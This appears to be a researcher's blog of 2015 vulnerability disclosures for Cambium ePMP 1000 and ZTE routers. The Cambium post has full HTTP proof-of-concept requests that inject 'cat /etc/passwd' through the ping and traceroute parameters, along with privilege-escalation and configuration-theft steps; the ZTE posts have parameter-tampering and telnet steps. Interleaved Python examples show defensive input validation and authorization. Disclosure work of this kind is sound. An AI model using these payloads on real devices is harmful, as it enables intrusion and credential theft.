Sunday, November 29, 2015

Cambium ePMP 1000 - Multiple vulnerabilities

July 14, 2015: First contacted Cambium
July 14, 2015: Initial vendor response
July 16, 2015: Vuln Details reported to Cambium
July 31, 2015: Followup on advisory and fix timelines
August 03, 2015: Vendor gives mid-Aug as fix (v2.5) release timeline. Ceases communication.
Nov 19, 2015: Releasing vulnerability details & poc
Versions affected: < v2.5
Exploit-db: https://www.exploit-db.com/exploits/38776/
PacketStorm: https://packetstormsecurity.com/files/134483/cambiumepmp1000-exec.txt

.....
CVE-IDs - To be assigned.
.....
Background
http://www.cambiumnetworks.com/products/access/epmp-1000/

ePMP™ 1000
Wireless service providers and enterprises need reliable, high-quality
broadband connectivity that can be rapidly deployed and expanded. The
ePMP platform provides stable coverage across large service areas and
enhances your existing infrastructure.

Deployed by:

ION Telecom
Kayse Wireless
Vanilla Telecom
Traeger Park
EszakNet
Edera
Videon
COMeSER
Seattle, WA
Budapest Video Surveillance
Desktop
Silo Wireless
Rocket Broadband
Snavely Forest Products
KRK Sistemi
KAJA Komputer
Root Media

Vulnerability Details

From Cambium Networks ePMP 1000 user / configuration guide:
ePMP 1000 has four (4) users -
- ADMINISTRATOR, who has full read and write permissions.
- INSTALLER, who has permissions to read and write parameters
applicable to unit installation and monitoring.
- HOME, who has permissions only to access pertinent information for
support purposes
- READONLY, who only has permissions to view the Monitor page.

.....

1. OS Command Injection

'admin' and 'installer' users have access to perform Ping and
Traceroute functions via GUI. No other user has this access.

The Ping function accepts the destination IP address via the 'ping_ip'
parameter and uses three (3) other parameters - packets_num, buf_size
and ttl - to perform the Ping.

Traceroute function accepts destination IP address via 'traceroute_ip'
parameter.

The application does not perform strict input validation for any of these
parameters - ping_ip, packets_num, buf_size and ttl for the Ping
function; and traceroute_ip for the Traceroute function.

This allows an authenticated user - 'admin', or the non-admin,
low-privileged 'installer' and 'home' users - to inject arbitrary
system commands that get executed by the host.
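The corrective control for this class of bug is to type-check every parameter strictly and to run the utility from an argv list with no shell in between, so that '|' and '||' are never interpreted. The following Python is an added example and not Cambium's firmware code; the -c/-s/-t flag names and the numeric limits are assumptions, and the same validator applies unchanged to traceroute_ip.

```python
import ipaddress
import re
import subprocess

# Allowed ranges for the three numeric ping parameters. The limits are
# assumed sane values for this example, not Cambium's.
INT_RANGES = {
    "packets_num": (1, 100),
    "buf_size": (1, 65500),
    "ttl": (1, 255),
}

def parse_int(name, value):
    """Accept only plain decimal digits inside the configured range."""
    if not re.fullmatch(r"[0-9]{1,5}", value):
        raise ValueError(f"{name}: not a plain integer: {value!r}")
    lo, hi = INT_RANGES[name]
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError(f"{name}: {n} is outside {lo}..{hi}")
    return n

def build_ping_argv(params):
    """Validate the four ping parameters and return a shell-free argv list.

    ipaddress.ip_address() accepts only a literal IPv4/IPv6 address, so
    '8.8.8.8|cat /etc/passwd ||' from the PoC raises ValueError here.
    The -c/-s/-t flag names are an assumption modelled on BusyBox ping.
    """
    target = str(ipaddress.ip_address(params.get("ping_ip", "")))
    count = parse_int("packets_num", params.get("packets_num", ""))
    size = parse_int("buf_size", params.get("buf_size", ""))
    ttl = parse_int("ttl", params.get("ttl", ""))
    return ["ping", "-c", str(count), "-s", str(size), "-t", str(ttl), target]

def run_ping(params, timeout=30):
    """Run ping from the argv list (never shell=True); return its output."""
    proc = subprocess.run(build_ping_argv(params), capture_output=True,
                          text=True, timeout=timeout)
    return proc.stdout

def is_rejected(params):
    """True when validation refuses the parameters (raises ValueError)."""
    try:
        build_ping_argv(params)
    except ValueError:
        return True
    return False
```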

.....
PING PoC
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0
[
or

ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0
or

ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0
or

ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0
]

.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash

.....
traceroute - PoC
.....
HTTP Request
.....

POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0

.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 16:09:26 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
.....
2. Weak Authorization Controls + privilege escalation

'home' and 'readonly' users do not have access to the Ping and Traceroute
functions via the management portal. However, the application lacks strict
authorization controls, and both functions can still be performed by
sending the corresponding HTTP(S) requests directly while logged in as
the low-privileged 'home' user.

When this flaw is combined with the OS Command Injection described above
affecting ping and traceroute, the non-admin, low-privileged 'home' user
can execute system-level commands via the 'ping' and 'traceroute'
functions, dump password hashes easily, and / or perform any other
system-level action.

Note: the 'readonly' user cannot perform this. Only the 'home' user can
exploit these.
.....
Steps to attack -
a. Login as the 'home' user
b. Craft & send HTTP requests for the ping and traceroute functions
.....
Login - HTTP Request
..
POST /cgi-bin/luci HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=home&password=<password>

.....
Login - HTTP Response
..

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Set-Cookie: sysauth=<home-sysauth_value>;
path=/cgi-bin/luci/;stok=<home-stok-value>
Content-Type: application/json
Expires: 0
Date: Sun, 18 Jan 1970 16:40:50 GMT
Server: Cambium HTTP Server
{ "stok": "<home-stok_value>", "certif_dir": "/tmp/new_certificates/",
"status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status" }

.....
Sending HTTP request for Ping function
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<home-sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Home User; usernameType=home; stok=<home-stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0

.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash

.....
Similarly, Traceroute function can be exploited.
............................................................................

3. Weak Authorization Controls + Information Disclosure

In addition to 'admin', only the 'installer' user has the option to access
the device configuration. The 'home' user has no GUI option and should
not be able to access / download the device configuration. However, the
application lacks strict authorization measures, and the low-privileged
'home' user can gain unauthorized access to the device configuration
simply by requesting it.
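Sections 2 and 3 stem from the same missing server-side check: the portal hides GUI options per role but does not enforce the role on the endpoint. The following Python is an added example, not Cambium's code, of an authorization layer that decides from the server-side session role alone and ignores the client-controlled userType/usernameType cookies; the session tokens are constructed placeholders.

```python
# Roles per the ePMP 1000 user guide. Only admin and installer may reach
# ping/traceroute (section 1) and the config export (section 3).
PERMISSIONS = {
    "/admin/ping": {"admin", "installer"},
    "/admin/traceroute": {"admin", "installer"},
    "/admin/config_export": {"admin", "installer"},
    "/admin/status": {"admin", "installer", "home", "readonly"},
}

# Constructed server-side session store (sysauth token -> role). The
# token values are made up for this example.
SESSIONS = {
    "tok-admin-0001": "admin",
    "tok-inst-0002": "installer",
    "tok-home-0003": "home",
    "tok-ro-0004": "readonly",
}

def authorize(sysauth, action):
    """Allow only if the role bound to the server-side session permits
    the action; unknown tokens and unknown actions are denied."""
    role = SESSIONS.get(sysauth)
    return role is not None and role in PERMISSIONS.get(action, set())

def handle(request):
    """Return an HTTP status: 401 with no valid session, 403 when the
    role lacks permission, 200 otherwise. The client-controlled
    userType/usernameType cookies are deliberately never consulted."""
    token = request.get("cookies", {}).get("sysauth", "")
    if token not in SESSIONS:
        return 401
    if not authorize(token, request.get("action", "")):
        return 403
    return 200

def audit_denied(requests):
    """Defender view: (role, action) for each request a correct
    authorization layer refuses with 403; these are worth alerting on."""
    return [(SESSIONS[r["cookies"]["sysauth"]], r["action"])
            for r in requests if handle(r) == 403]
```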

Configuration backup export can be performed by directly accessing
the following url:
http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json

Upon a successful config export, the full device configuration - with
clear-text passwords, usernames, keys, IP addresses, statistics, logs,
etc. - is downloaded.

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: application/json
Content-Disposition: attachment; filename=<filename>.json
Expires: 0
Date: Sun, 18 Jan 1970 16:50:21 GMT
Server: Cambium HTTP Server
{
"template_props":
{
"templateName":"",
"templateDescription":"",
"device_type":"",
<output - snipped>
}

Wednesday, November 18, 2015

ZTE ADSL ZXV10 W300 Modems - Multiple vulnerabilities

Confirmed on 2 (of multiple) software versions - W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57

CVE-ID
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259

Note: Large deployment size, primarily in Peru, used by TdP (Telefonica del Peru).

Insufficient authorization controls
CVE-ID: CVE-2015-7257
Observed in the Password Change functionality. Other functions may be vulnerable as well.
Expected behavior:
Only the administrative 'admin' user should be able to change the password of any device user. 'support' is a diagnostic user with restricted privileges; it can change only its own password.
Vulnerability:
Any non-admin user can change the 'admin' password.

Steps to reproduce:
a. Login as user 'support' with password XXX
b. Access the Password Change page - http://<IP>/password.htm
c. Submit the request
d. Intercept and tamper the 'username' parameter - change it from 'support' to 'admin'
e. Enter the new password -> the old password is not requested -> Submit
-> Login as admin
-> Pwn!


Sensitive information disclosure - clear-text passwords
Displaying user information over a Telnet connection shows all valid users and their passwords in clear-text.
CVE-ID: CVE-2015-7258
Steps to reproduce:
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: <--- admin/XXX1
$sh
ADSL#login show                 <--- shows user information
Username     Password   Priority
admin        password1  2
support      password2  0
admin        password3  1

(Potential) Backdoor account feature - insecure account management
The same login account name can exist on the device multiple times, each with a different priority number. It is possible to log in to the device with either username/password combination.
CVE-ID: CVE-2015-7259
It is considered a (redundant) login support feature.

Steps to reproduce:
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: <--- admin/password3
$sh
ADSL#login show
Username     Password   Priority
admin        password1  2
support      password2  0
admin        password3  1

Thursday, November 5, 2015

ZTE ZXHN H108N R1A routers contain multiple vulnerabilities

CERT published Vulnerability Note VU#391604 on my report of multiple vulnerabilities in ZTE ZXHN H108N R1A routers.
CVE #: 
CVE-2015-7248 
CVE-2015-7249 
CVE-2015-7250 
CVE-2015-7251 
CVE-2015-7252


Just found that ZTE PSIRT posted an official statement on Nov 18, 2015:
http://support.zte.com.cn/support//news/LoopholeInfoDetail.aspx?newsId=1006863

Note: Large deployment size, primarily in Peru, used by TdP (Telefonica del Peru).


Overview

ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities.

Description

CWE-200: Information Exposure - CVE-2015-7248
Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A.
  1. User names and password hashes can be viewed in the page source of http://<IP>/cgi-bin/webproc
  2. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE.

CWE-285: Improper Authorization - CVE-2015-7249

By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. By manipulating parameters in client-side requests, an attacker may authenticate as another existing account, such as 'user' or 'support', and may be able to perform actions otherwise not allowed. For instance, while authenticated as 'support', directly accessing http://<IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd permits changing the password of 'user'.

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - CVE-2015-7250

The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter which takes an unrestricted file path as input, allowing an attacker to read arbitrary files on the system.
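A contained way to handle a getpage-style parameter, as an added Python example that is not ZTE's code: the value is resolved to a real path and served only if it still lies inside a fixed page directory and names a page file. The page root /www/html and the allowed suffixes are assumptions.

```python
import os

PAGE_ROOT = "/www/html"                # assumed location of the page files
ALLOWED_SUFFIXES = (".html", ".htm")   # assumed: only rendered pages are servable

def resolve_getpage(getpage, root=PAGE_ROOT):
    """Map a getpage value to an on-disk path under `root`, or raise ValueError."""
    if not getpage or "\0" in getpage:
        raise ValueError("empty or NUL-containing page name")
    root_real = os.path.realpath(root)
    # os.path.join would discard `root` for an absolute getpage, so strip
    # leading slashes first; realpath then collapses any '..' components.
    candidate = os.path.realpath(os.path.join(root_real, getpage.lstrip("/")))
    # The decisive check: the resolved path must still sit inside root.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError(f"path escapes page root: {getpage!r}")
    if not candidate.endswith(ALLOWED_SUFFIXES):
        raise ValueError(f"disallowed page type: {getpage!r}")
    return candidate

def is_allowed(getpage, root=PAGE_ROOT):
    """True when `getpage` resolves to a servable page file under root."""
    try:
        resolve_getpage(getpage, root)
    except ValueError:
        return False
    return True
```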

CWE-798: Use of Hard-coded Credentials - CVE-2015-7251

In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2015-7252

In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is vulnerable to reflected cross-site scripting.

Impact

A LAN-based attacker can obtain credentials and configuration information, bypass authentication, access arbitrary files, and gain complete control of affected devices. Note that in some configurations, an external attacker may be able to leverage these vulnerabilities.

Solution

Apply an update
The vendor has issued ZTE.bhs.ZXHNH108NR1A.k_PE to address the vulnerabilities affecting ZTE ZXHN H108N R1A. Users are encouraged to contact their Internet service provider for updates.

Note that W300 models are no longer officially supported and will not be receiving any updates. Users should consider the following workaround.
Discontinue use

ZTE states:
    The vulnerable W300 router was officially replaced by the H108N V2.1 released in July 2014, and the vulnerable H108N has finished upgrading to version ZTE.bhs.ZXHNH108NR1A.k_PE through operator channels, in which all the vulnerabilities mentioned herein were fixed. ZTE recommends that users contact local operators for upgrade service.

Since patches will not be issued to address vulnerabilities in W300 routers, users should strongly consider discontinuing use of affected devices. Users of ISP-provisioned W300 devices should request replacement routers.

Credit

Thanks to Karn Ganeshen for reporting these vulnerabilities.

This document was written by Joel Land.

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.